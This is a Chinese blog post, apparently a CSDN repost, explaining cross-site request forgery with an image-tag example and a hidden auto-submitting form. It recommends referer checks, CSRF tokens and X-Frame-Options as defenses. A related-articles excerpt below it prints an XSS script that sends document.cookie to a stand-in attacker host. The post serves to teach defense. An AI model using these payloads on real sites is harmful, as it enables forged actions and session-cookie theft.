网络安全-CSRF

最新推荐文章于 2023-07-05 18:41:51 发布
最新推荐文章于 2023-07-05 18:41:51 发布
阅读量124 收藏
点赞数
文章标签: 网络 后端 php
原文链接:https://segmentfault.com/a/1190000011902318
版权

原文请看我的GitHub博客>>

CSRF介绍

跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。

简单的说,就是利用游览器对用户的信任,比如,用户已经登录了ww.aaa.com,自然aaa这个网站就会将用户的登录状态session存在cookie中;
然后,aaa.com这个网页有一个对作品点赞的功能,点赞提交地址为aaa.com/api.like?id=777
这时,另外一个叫www.bbb.com的网站,放了这样一个元素<img src="aaa.com/api.like?id=888">,这样的话,一旦用户进入这个bbb.com页面,就会请求aaa.com这个网站的点赞接口,而且点赞的用户对象是888;
最后因为用户的登录信息尚未过期,那就等于给id为888这个作品点赞了,然而,用户并不知情。

防御方式

有两种方法:

  1. 后端判断referer是否合法(不推荐)
    通过HTTP的referer可知道,用户是通过哪个网站发送这个请求的。但是referer的判断并不是好方法,有各种方式可以绕过的方法,具体可见 CSRF 花式绕过Referer技巧>>
  2. 每次请求带上token
    比如laravel,在后端模板渲染的时候会提供一个csrf的token,这样的话,不同域的网站是拿不到token的,所以也就防止了csrf了。

补充

使用iframe会引出一些不安全的问题,比如绕过referer验证,比如资源盗用等,所以,很多网站会设置X-Frame-OptionsDENY,这也是一个安全的补充点。

Q&A

问:既然请求静态资源都是get请求,那么要是后端把点赞接口改为post的方式也可以吧?

答:不可以。因为,bbb.com网站完全可以设置一个form表单,action为bbb.com,method为post,接着input的name为id,value为888,然后,script代码直接submit表单。为了页面不重定向,还可以在form外层加一个iframe。由于form表单其实是直接跳转,所以不存在跨域的问题。

总结

防止CSRF的最好方法还是带token吧~

weixin_34068198
关注
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 014-网络安全应急技术与实践(Web层-CSRF跨站攻击)
时光隧道
02-10 7万+
CSRF(跨站请求伪造)是一种网络攻击方式。网站通常通过Cookie来识别用户,一旦用户通过身份验证,浏览器就会得到一个用于标识用户的Cookie。任何带有这个Cookie的操作都被认为是该用户所执行的。黑客可以利用这个Cookie向网站发送请求,网站会认为这是用户发送的请求,从而达到伪造请求的目的。这种攻击方式通常由第三方站点发起,因此称为“跨站”。
基础网站后台攻击
06-05
基础网站后台攻击
运维之前后端网络攻击类型
qq_36851469的博客
07-05 470
分布式拒绝服务(Distributed Denial of Service,简称DDoS)是指将多台计算机联合起来作为攻击平台,通过远程连接,利用恶意程序对一个或多个目标发起DDoS攻击,消耗目标服务器性能或网络带宽,从而造成服务器无法正常地提供服务。【主要针对的是后端服务器】攻击原理:通常,攻击者使用一个非法账号将DDoS主控程序安装在一台计算机上,并在网络上的多台计算机上安装代理程序。
45种攻入后台的方法
08-27
45种攻入后台的方法,并且有介绍各种工具。 本文档老鸟可以不下载,新手不想浪费积分我这里有介绍: 阿D、明小子、挖掘鸡、wwwcan......
(后端)十种网络攻击行为介绍 您能顶住几个?(转)
weixin_30692143的博客
02-08 924
转自脚本之家: 近几年,互联网的应用呈现出一种爆发增长的态势,网速越来越快,能够遍寻的软件越来越多,初级黑客凭借一些入门的教程和软件就能发起简单的攻击;另一方面,电脑的价格持续下降,企业内部的终端数量也在逐步增加,更多的资源,更复杂的网络使得IT运维人员在管控内网时心力交瘁,面对这些内忧外患,我们不得不重新审视网络安全问题。下面,我们将介绍一些攻击行为案例,对于这些行为不知您是否遇到过?您的网...
web常见攻击手段
my_web012的博客
05-06 160
XSS (Cross site scripting)跨站脚本攻击,因为缩写和CSS重叠,所以叫做XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击。 影响: 利用虚假输入表单骗取用户个人信息。 利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求。 显示伪造的文章或图片。 XSS攻击分为两大类: 反射型 - 通过URL参数直接注入 http://localhost:3000/?from=
CSRF:ring-csrf示例
01-28
二是通过`X-CSRF-TOKEN` HTTP头发送。`ring-csrf`库提供方便的函数如`ring-csrf/token`,可以在模板渲染时插入令牌。 4. **例外处理**:当CSRF验证失败时,`ring-csrf/protect`中间件可以配置为返回特定的HTTP错误...
spring-security-jwt-csrf:使用Spring Security,Spring Boot和Vue js进行无状态JWT身份验证的演示
01-31
ЭтодемонстрацияаутентификациинаосноветокенасиспользованиемJSON网络令牌иCSRF,Spring安全,Spring启动иVue的JS。 СтекТехнологий...
54-54.渗透测试-CSRF漏洞挖掘.mp4
最新发布
05-10
54-54.渗透测试-CSRF漏洞挖掘.mp4
53-53.渗透测试-CSRF案例分析.mp4
05-10
53-53.渗透测试-CSRF案例分析.mp4
Web安全之CSRF攻击
weixin_34221775的博客
03-01 323
CSRF是什么? CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。 举个例子 简单版: 假如博客园有个加关注的GET接口,blogUserGuid参数很明显是关注人Id,如下: htt...
解决后台攻击问题
orchids_lan的专栏
12-22 716
一,首先服务器一定要把administr禁用,设置一个陷阱账号:"Administrator"把它权限降至最低,然后给一套非常复杂的密码,重新建立一个新账号,设置上新密码,权限为administraor然后删除最不安全的组件:建立一个BAT文件,写入regsvr32/u C:/WINDOWS/System32/wshom.ocxdel C:/WINDOWS/System32/wshom.o
四种常见的Web攻击手段及其防御方式
codingWeb的博客
05-18 1071
XSS: 概念: 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序。 案列: 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样 <script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段
常见的网络攻击
weixin_38099964的博客
02-06 1116
常见的网络攻击一、前端(客户端)攻击1、XSS攻击1、攻击类型反射型XSS攻击持久型XSS攻击DOM XSS2、预防方法2、CSRF攻击防御方法cookie设置为HttpOnlytoken通过Referer识别二、后端(服务端)攻击1、SQL注入防御方法2、DNS Query Flood攻击3、CC攻击4、DDos漏洞 一、前端(客户端)攻击 前端攻击主要以跨站攻击为主,如 1、XSS攻击 XSS攻击即跨站点脚本攻击(Cross Site Script),它允许恶意web用户将代码植入到提供给其它用户使用的
后端接口API的安全性考虑
阿伟的博客
03-30 2475
后端接口API的安全性考虑,如何设计安全的API接口。
常见网络攻击方式介绍及短信防攻击策略的后端实现
weixin_41910244的博客
06-01 2575
大家好,今天给大家分享一下:几种常见的网络攻击方式的介绍以及短信防攻击策略的后端实现。 一、背景介绍 有人的地方就有江湖,有数据交互的地方,就存在入侵风险。 只有知己知彼,才能百战不殆。我们学习相关知识不是为了去攻击别人的服务器,只是为了防范于未然。 攻击的种类多种多样:SQL注入,旁注,XSS跨站,COOKIE欺骗,DDOS,0day 漏洞,社会工程学 等等等等。 二、知识剖析 1....
【Web爆破攻击实战】真正的黑客 是怎样进入目标后台的?
jennycisp的博客
06-18 2651
在很多情况下,黑客在找不到其他途径进入 Web 管理后台时,就会采用暴力破解的方式来破解后台管理员的账号和密码。所谓暴力破解,就是使用“穷举法”,对用户名和密码进行逐个猜解,直至猜出来为止。虽然暴力破解显得不是很有技术含量,但确实最有效的一种方式。理论上来说,只要时间足够,终究会把用户名和密码猜解出来。为了提高暴力破解的效率,一般在破解时,都会使用字典。所谓字典,就是黑客会把自己认为的有可能是正确的密码,以及曾经碰到过的密码,写到一个文档里去,这个文档就是字典。
黑客攻击手段
m0_70754056的博客
06-07 2461
黑客攻击手段可分为非破坏性攻击和破坏性攻击两类。非破坏性攻击一般是为了扰乱系统的运行,并不盗窃系统资料,通常采用拒绝服务攻击或信息炸弹;破坏性攻击是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的。下面为大家介绍4种黑客常用的攻击手段。 黑客攻击 1、后门程序 由于程序员设计一些功能复杂的程序时,一般采用模块化的程序设计思想,将整个项目分割为多个功能模块,分别进行设计、调试,这时的后门就是一个模块的秘密入口。在程序开发阶段,后门便于测试、更改和增强模块功能。正常情况下,完成设计之后需
总结后端开发常见安全问题及应对方案
热门推荐
baoruizhe的博客
11-16 1万+
前言 本文主要梳理到公司参与团队后端开发2年多来,总结开发过的项目中遇到的各种安全问题及应对方案。 目前我们后端团队使用的技术主要还是SpringBoot + Mysql + Redis这一套 ,暂未涉及到SpringBoot Cloud,后面内容主要围绕目前团队使用的技术框架来讲解的。 平时大家可能更多注重业务层面的开发(CRUD),然后实现产品的需求就行了,但是却忽略了产品上线后的各种安全问题带来的影响。 下面总结了一些过去发生过的(出现频率高,影响严重的)开发上的问题及带来的严重影响: 安全问
如何解决网络安全CSRF问题
09-01
网络安全CSRF问题是一种跨站请求伪造攻击,攻击者可以利用用户已经登录的身份来执行未经授权的操作。为了解决这个问题,可以采取以下几种方式: 1. 在请求中添加Token验证:可以在页面中生成一个随机的Token,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值